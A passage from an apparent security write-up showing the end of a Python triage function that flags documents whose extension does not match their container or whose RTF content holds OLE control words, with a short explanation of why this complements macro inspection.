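    mismatch = expected is not None and container not in expected
    ole_words = rtf_ole_words(data) if container == "rtf" else []
    verdict = "suspicious" if (mismatch or ole_words) else "no-finding"
    return {
        "extension": ext,
        "container": container,
        "extension_mismatch": mismatch,
        "rtf_ole_words": ole_words,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for name, blob in [("Order Ref-22550.doc", SAMPLE_RTF_AS_DOC),
                       ("report.doc", SAMPLE_OLE_DOC),
                       ("report.docx", SAMPLE_DOCX)]:
        print(name, triage_document(name, blob))
```

Word opens RTF content whatever the extension says, which is why the mismatch alone is worth a quarantine rule. A genuine OLE2 .doc passes this check and can still carry a malicious macro, so it complements rather than replaces macro inspection (olevba from oletools is the usual tool for that).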



